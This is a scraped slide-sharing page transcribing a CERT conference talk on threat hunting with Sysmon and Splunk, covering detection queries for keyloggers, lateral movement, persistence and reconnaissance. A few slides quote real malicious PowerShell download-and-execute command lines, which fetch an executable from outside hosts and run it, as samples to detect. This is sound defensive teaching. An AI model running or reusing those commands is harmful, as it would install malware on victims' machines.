advanced incident detection and threat hunting using
play

Advanced Incident Detection and Threat Hunting using Sysmon (and - PowerPoint PPT Presentation

Nov 09, 2023 •421 likes •1.73k views

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi, Swiss Post CERT FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 1 C:\> whoami

  1. Advanced Detection (Adwind RAT) JBifrost RAT alert_sysmon_java-malware-infection index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs) | search Image="* \\AppData\\Roaming\\Oracle\\bin\\java*.exe *" OR (Image="*\\ xcopy.exe *" CommandLine="* \\AppData\\Roaming\\Oracle\\ *") OR CommandLine="* cscript*Retrive*.vbs *" FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 45

  2. Detecting Keyloggers  Keyloggers and Password-Stealers abusing NirSoft tools  Limitless Logger  Predator Pain  HawkEye Keylogger  iSpy Keylogger  KeyBase Keylogger CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt CommandLine: <PATH-TO-EXE>\*.exe /scomma ... index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" ( stext OR scomma ) | search CommandLine="* /stext *" OR CommandLine="* /scomma *" FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 46

  3. Detecting Keyloggers  BONUS: detecting new Banking Trojan variant (Heodo/Emotet)  Link in email to download JS from web server ( DHL__Report__*.js )  Executing JS downloads EXE from web server  EXE uses «/scomma» parameter (YARA: NirSoft strings in memory) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 47

  4. Detecting Keyloggers  BONUS: detecting new Banking Trojan variant (Heodo/Emotet) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 48

  5. Malicious PowerShell index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (powershell.exe OR cmd.exe) | eval CommandLine2=replace(CommandLine,"[ '+\"\^]","") | search (Image="*\\ powershell.exe " OR Image="*\\ cmd.exe ") CommandLine2="* WebClient *" CommandLine2="* DownloadFile *" "C:\Windows\System32\ cmd.exe " /c powershell -command (("New-Object Net. WebClient ")).(" 'Do' + 'wnloadfile' ").invoke( 'http://unofficialhr.top/tv/homecooking/tenderloin.php', 'C:\Users\***\AppData\Local\Temp\spasite.exe'); & Remove all "C:\Users\***\AppData\Local\Temp\spasite.exe" obfuscation chars CommandLine2: C:\Windows\System32\ cmd.exe /cpowershell-command((New-ObjectNet. WebClient )). ( Downloadfile ).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php, C:\Users\purpural\AppData\Local\Temp\spasite.exe);& C:\Users\purpural\AppData\Local\Temp\spasite.exe  De-obfuscate simple obfuscation techniques Are all (obfuscation) problems solved? FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 49

  6. Malicious PowerShell cmd.exe /c powershell -c $eba = ('exe'); $sad = (' wnloa '); (( New-Object Net. WebClient )).( ' Do ' + $sad + ' dfile ' ).invoke( 'http://golub.histosol.ch/bluewin/mail/inbox.php' 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba) «De-obfuscated»: powershell-c$eba=(exe); $sad =( wnloa );((New-ObjectNet. WebClient )).( Do$saddfile ) .invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData \Local\Temp\doc.$eba); start(C:\Users\*****\AppData\Local\Temp\doc.$eba) LNK with Powershell command Query doesn’t match - embedded in DOCX file (oleObject.bin) «DownloadFile» Sample from 2016-11-18 d8af6037842458f7789aa6b30d6daefb Abrechnung # 5616147.docx 2b9c71fe5f121ea8234aca801c3bb0d9 Beleg Nr. 892234-32.lnk Strings from oleObject.bin: E:\TEMP\G\18.11.16\ch1\golub\ Beleg Nr. 892234-32.lnk C:\Users\azaz\AppData\Local\Temp\ Beleg Nr. 892234-32.lnk FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 50

  7. Processes connecting thru Proxy index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1 [ search index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Image="*\\Users\\*" DestinationHostname="proxy.fqdn" | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid ] | fields Hashes ComputerName Image ParentImage | rex field=Hashes ".* MD5 =(?<MD5>[A-F0-9]*), IMPHASH =(?<IMPHASH>[A-F0-9]*)" | rex field=Image ".*\\\\ Users \\\\(?< username >[^\\\\]+)\\\\.*" | rex field=Image ".*\\\\+(?< proc_name >[^\\\\]+\.[eE][xX][eE]).*" | rex field=ParentImage ".*\\\\+(?< pproc_name >[^\\\\]+\.[eE][xX][eE]).*" | stats dc(ComputerName) AS CLIENTS, dc(MD5) AS CNT_MD5, dc(Image) AS CNT_IMAGE, values(username) AS Users, values(ComputerName) AS Computers, values(MD5) AS MD5, values(proc_name) AS proc_name, values(pproc_name) AS pproc_name by IMPHASH | where CLIENTS < 15 | sort – CLIENTS  IMPHASH = Import Hash FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 51

  8. SMB traffic between WS index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Initiated=true SourceIp!=DestinationIp DestinationPort=445 Image!=System (SourceHostname=" WS* " DestinationHostname=" WS* ") OR (SourceIp=" 10.10.*.* " DestinationIp=" 10.10.*.* ") | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid  Search for network connections  SMB protocol (dst port 445)  Source and destination are workstations (hostname or IP)  Use « ProcessGuid » to correlate with other event types ( proc’s )  Search for legitimate SMB servers (filers, NAS)  Create «whitelist» to exclude as legit dest FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 52

  9. Lateral Movement (admin shares) CS_Lateral_Movement_psexec 10/18/2016 11:17:12 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 C:\Windows\system32\services.exe Type=Information  \\127.0.0.1\ADMIN$\8c0cb58.exe ... Message= Process Create: Image: \\127.0.0.1\ADMIN$\8c0cb58.exe CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe CurrentDirectory: C:\Windows\system32\ User: NT AUTHORITY\SYSTEM IntegrityLevel: System ParentImage: C:\Windows\system32\services.exe ParentCommandLine: C:\Windows\System32\services.exe  Search for admin share names in image paths FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 53

  10. Lateral Movement (admin shares) CS_Lateral_Movement_psexec 10/18/2016 11:17:13 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 C:\Windows\system32\services.exe EventType=4  \\127.0.0.1\ADMIN$\8c0cb58.exe Type=Information  C:\Windows\system32\rundll32.exe ... Message= Process Create: Image: C:\Windows\SysWOW64\rundll32.exe CommandLine: C:\Windows\System32\rundll32.exe CurrentDirectory: C:\Windows\system32\ User: NT AUTHORITY\SYSTEM IntegrityLevel: System ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe  Search for admin share names in image paths FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 54

  11. Lateral Movement (proc injection) CS_Lateral_Movement_psexec 10/18/2016 11:17:13 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 \\127.0.0.1\ADMIN$\8c0cb58.exe EventType=4 # C:\Windows\system32\rundll32.exe Type=Information ... Message= CreateRemoteThread detected: SourceProcessId: 29340 SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe TargetProcessId: 18476 TargetImage: C:\Windows\SysWOW64\rundll32.exe NewThreadId: 20060 StartAddress: 0x0000000000110000 StartFunction:  Search for rarest source or target images from proc injection FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 55

  12. Keylogger (proc injection) CS_Keylogger_injection 10/26/2016 11:56:32 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 C:\Windows\SysWOW64\rundll32.exe EventType=4 # C:\Windows\system32\winlogon.exe Type=Information ... Message= CreateRemoteThread detected: SourceProcessId: 17728 SourceImage: C:\Windows\SysWOW64\rundll32.exe TargetProcessId: 836 TargetImage: C:\Windows\System32\winlogon.exe NewThreadId: 14236 StartAddress: 0x0000000000C20000 StartFunction:  Suspicious proc injection into «winlogon.exe»  Steal user’s password while logging on or unlocking screensaver FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 56

  13. FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 57

  14. Hunting for Delivery of Malware  Malicious files downloaded via Browser  Sysmon «FileCreateStreamHash» events generated  Remember the malicious JS files from email links? (Heodo/Emotet) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 58

  15. Hunting for Delivery of Malware  Remember that JS Filename from before?  Let’s hunt for that … ( DHL__Report__*.js ) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 59

  16. Hunting for Delivery of Malware FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 60

  17. Hunting for Delivery of Malware FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 61

  18. Hunting for Delivery of Malware FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 62

  19. Hunting for Delivery of Malware FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 63

  20. Hunting for Delivery of Malware FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 64

  21. Hunting for Delivery of Malware NEW Email link clicked Doc file downloaded FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 65

  22. Hunting for Delivery of Malware NEW Doc file opened FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 66

  23. Hunting for Delivery of Malware NEW Word doc macro enabled FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 67

  24. Detecting Persistence Methods  Hunting for Persistence Methods – Registry Keys – Filesystem (e.g. Startup folders) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 68

  25. Detecting Persistence (Registry)  Searching for «Run» or «RunOnce» keys FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 69

  26. Detecting Persistence (Registry) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 70

  27. Detecting Persistence (Registry) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 71

  28. Detecting Persistence (Filesystem)  Example for «ProcessCreate», not «FileCreate» FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 72

  29. Detecting Persistence (Filesystem) This should make you go «Hmmm??» FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 73

  30. Detecting Persistence (Filesystem)  Example for «FileCreate»  Less than 400 results in > 2 months  after tuning exclusion list FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 74

  31. Detecting Persistence (Filesystem) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 75

  32. Detecting Persistence (Filesystem) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 76

  33. Detecting Internal Recon  Internal Recon used as preparation for Lateral Movement  Legit system commands used  Can also be used by sysadmins or users  Baseline and find appropriate thresholds – Number of different commands and time window FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 77

  34. Detecting Internal Recon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 78

  35. Detecting Internal Recon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 79

  36. Detecting Internal Recon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 80

  37. Detecting Internal Recon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 81

  38. Detecting Internal Recon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 82

  39. Detecting Internal Recon  3 or more (of 7) different commands executed within 15 min FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 83

  40. Detecting Internal Recon 15 occurences 6 diff cmds within 15 mins FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 84

  41. Detecting Internal Recon «False detections» are possible Explorer -> cmd.exe 3 diff cmds within 3 mins FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 85

  42. Lateral Movement  Lateral Movement using WMI for Execution FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 86

  43. ATT&CK TTP on WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 87

  44. Who’s (ab-)using WMI  Point 1 FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 88

  45. Who’s (ab-)using WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 89

  46. Who’s (ab-)using WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 90

  47. Who’s (ab-)using WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 91

  48. Who’s (ab-)using WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 92

  49. Who’s (ab-)using WMI FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 93

  50. Testing with WMImplant  Testing «command_exec» using WMImplant with PS-ISE FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 94

  51. Testing with WMImplant  Testing «process_start» using WMImplant with Beacon FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 95

  52. Detecting WMI spawned proc’s  Point 1 FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 96

  53. Detecting WMI spawned proc’s  Point 1 FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 97

  54. Detecting WMI spawned proc’s  Searching for Child-Process creations of «wmiprvse.exe»  Filtering out «known good» processes  Don’t filter out «Powershell.exe» in general  Combine with «CommandLine» params FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 98

  55. Detecting WMI spawned proc’s  Command executions («powershell *$env:*» and IEX, obfusc.)  Processes started (calc.exe, notepad.exe …) FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 99

  56. Detecting WMI spawned proc’s  Also detecting CS Beacons WMI Lateral Movement method  «powershell.exe … -encodedcommand …» FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 100

Recommend

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi, Swiss

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi, Swiss

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi, Swiss Post CERT Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 1 C:\&gt; whoami /all

1.34k views • 115 slides
The New Security Frontier: Threat Hunting, Augmented Intelligence, and Automated Response

The New Security Frontier: Threat Hunting, Augmented Intelligence, and Automated Response

The New Security Frontier: Threat Hunting, Augmented Intelligence, and Automated Response Michael Melore, CISSP IBM Cyber Security Advisor @MichaelMelore June 2018 May 2018 May 2018 Threat Hunting Workflow Cognitive Advanced Analytics

443 views • 15 slides
Bridging Security In Intelligence: Hacking, g, Threat Hunting, g, AI, I, Behavioral Anomalies,

Bridging Security In Intelligence: Hacking, g, Threat Hunting, g, AI, I, Behavioral Anomalies,

Bridging Security In Intelligence: Hacking, g, Threat Hunting, g, AI, I, Behavioral Anomalies, and In Incident Response Dangerous Toys USB Device Impersonators USB Killers Man in the Middle Faceplates Wireless Pineapples Payload Phone

727 views • 30 slides
What The HELK? Enabling Graph Analytics for Effective Threat Hunting HELK THP OSSEM Agenda

What The HELK? Enabling Graph Analytics for Effective Threat Hunting HELK THP OSSEM Agenda

What The HELK? Enabling Graph Analytics for Effective Threat Hunting HELK THP OSSEM Agenda Effective Threat Hunting? Current state of threat hunting programs Graph Theory Definition Origins Types Graph

1.69k views • 75 slides
Azure Advanced Threat Protection

Azure Advanced Threat Protection

SecOps and Incident Response with Azure Advanced Threat Protection THE DAILY NEWS Attack shuts down xxxxxx organization for 2 days Investigation determined Wrecking ball

264 views • 10 slides
Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick

Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick

Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick Offerman Research Project 2 #72 Introduction - Advanced Threat Analytics (ATA) Microsoft Active Directory (AD) On-premise Post-Infiltration

439 views • 25 slides
What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

DDoS &amp; Modern Threat Motives Dan Holden Director, ASERT What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape Geo-poli:cal More defenses ? App/Content t a

1.13k views • 44 slides
Hunting beacons Bartosz Jerzman agenda Part I: HTTP beacon detection Part II: HTTPS beacon

Hunting beacons Bartosz Jerzman agenda Part I: HTTP beacon detection Part II: HTTPS beacon

Hunting beacons Bartosz Jerzman agenda Part I: HTTP beacon detection Part II: HTTPS beacon detection Part III: Lets hunt them early C2 scanning whoami Sysadmin and network defender for the Polish Navy Incident responder

720 views • 52 slides
Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a

Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a

Prepared by Curtis Sommerfeld, 10/9/2015 Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a cruel hoax, placing both the college community and emergency responders in harms way , causing much

373 views • 4 slides
MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat

MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat

MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat Intelligence and Hunting Jamie Buening, Manager, Threat Intelligence and Hunting, MISO August 21, 2019 MRO SAC Update Technical Training and Social

478 views • 45 slides
Hunting Through RDP Data BroCon 2015 Josh Liburdi 1 Quick Introduction Currently: Senior

Hunting Through RDP Data BroCon 2015 Josh Liburdi 1 Quick Introduction Currently: Senior

Hunting Through RDP Data BroCon 2015 Josh Liburdi 1 Quick Introduction Currently: Senior Consultant at CrowdStrike Previously: Large-scale detection at Fortune 5 Bro user for 2+ years Focus on network forensics and incident response

958 views • 50 slides
DNS-BASED THREAT HUNTING: learn, share and improve. repeat. Joo Collier de Mendona @sec_joao

DNS-BASED THREAT HUNTING: learn, share and improve. repeat. Joo Collier de Mendona @sec_joao

TLP WHITE DNS-BASED THREAT HUNTING: learn, share and improve. repeat. Joo Collier de Mendona @sec_joao Zurich, September 2016. $ whoami Brazilian living in Germany for a long time Since 2010 at Deutsche Telekom CERT / CDC

643 views • 27 slides
When threat hunting fails Identifying malvertising domains using lexical clustering Tucson,

When threat hunting fails Identifying malvertising domains using lexical clustering Tucson,

When threat hunting fails Identifying malvertising domains using lexical clustering Tucson, January 9th, 2018 Authors kitty Matt Foley David Rodriguez Dhia Mahjoub 2 Background Ad Network Profiling and Filtering Agenda Lexical Clustering

717 views • 45 slides
Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon Supervisors: Marco Davids, Christian Hesselman (SIDN) About Advanced Persistent Threats Advanced Persistent Threat (APT) [2]; Highly skilled and

342 views • 32 slides
Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and

Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and

Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and Challenges Challenges Mission critical information = High value target Threatens Government organizations and large corporations

435 views • 39 slides
Assessing Targeted Attacks in Incident Response Threat Correlation Jan 2017

Assessing Targeted Attacks in Incident Response Threat Correlation Jan 2017

Assessing Targeted Attacks in Incident Response Threat Correlation Jan 2017 www.lookingglasscyber.com PRESENTER: Allan Thomson, CTO Dr Jamison Day, Principal Data Scientist 2017 LookingGlass Cyber Solutions Inc. 1 What threats are

344 views • 21 slides
Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group

Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group

Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group July 18, 2017 Douglas D. Thomas Director, Counterintelligence Operations &amp; Corporate Investigations Lockheed Martin Counterintelligence

706 views • 16 slides
Detection and Incident Response With osquery Javier Marcos @javutin $ whoami Security

Detection and Incident Response With osquery Javier Marcos @javutin $ whoami Security

Detection and Incident Response With osquery Javier Marcos @javutin $ whoami Security Engineer/Incident Responder Open source contributor (github.com/javuto) Former IBM, Facebook, Uber and Airbnb Current BitMEX Agenda Part 1:

981 views • 59 slides
OSINT: The Secret Weapon in Hunting Nation-State Campaigns alon@intsights.com Alon Arvatz

OSINT: The Secret Weapon in Hunting Nation-State Campaigns alon@intsights.com Alon Arvatz

DETECT . ANALYZE . REMEDIATE OSINT: The Secret Weapon in Hunting Nation-State Campaigns alon@intsights.com Alon Arvatz +972-545444313 1 1 1 What People Think 2 True or False? Threat intelligence Nation-state actors Commercial threat

247 views • 24 slides
Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting PLC Global Footprint 2 2009 Corporate Highlights Completed three acquisitions 47.3m Sale of Hunting Energy France 11.1m Year end

857 views • 37 slides
IncIdent SurvIval PreSented by commander mark carman and Sgt. mIchael lutz IncIdent SurvIval

IncIdent SurvIval PreSented by commander mark carman and Sgt. mIchael lutz IncIdent SurvIval

IncIdent SurvIval PreSented by commander mark carman and Sgt. mIchael lutz IncIdent SurvIval Know what to do if there is a violent threat at school &quot;AN HONOR TO SERVE, A DUTY TO PROTECT&quot; Violence against schools and students are

599 views • 27 slides
CYBER INCIDENT DETECTION AND RESPONSE DESK REFERENCE OVERVIEW Matt Masterson 1 February 4,

CYBER INCIDENT DETECTION AND RESPONSE DESK REFERENCE OVERVIEW Matt Masterson 1 February 4,

C I S A | C Y B E R S E C U R I T Y A N D I N F R A S T R U C T U R E S E C U R I T Y A G E N C Y CYBER INCIDENT DETECTION AND RESPONSE DESK REFERENCE OVERVIEW Matt Masterson 1 February 4, 2020 Cyber Incident Detection and Agenda 1

240 views • 9 slides
Cyber Security, Threat Hunting and Defense Challenge in Taiwan Academic Network NCHC/TWCSIRT

Cyber Security, Threat Hunting and Defense Challenge in Taiwan Academic Network NCHC/TWCSIRT

Cyber Security, Threat Hunting and Defense Challenge in Taiwan Academic Network NCHC/TWCSIRT Research Fellow Yi-Lang Tsai 1 Google Me. Yi-Lang Tsai ( ) Research Fellow , NCHC (National Center for High-performance

781 views • 49 slides
PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub

PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub

PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub egan {husakm|cegan}@ics.muni.cz ECTCM 2014 Fribourg, Switzerland Outline Introduction, Phishing incident response, PhiGARo (phishing

270 views • 23 slides

More recommend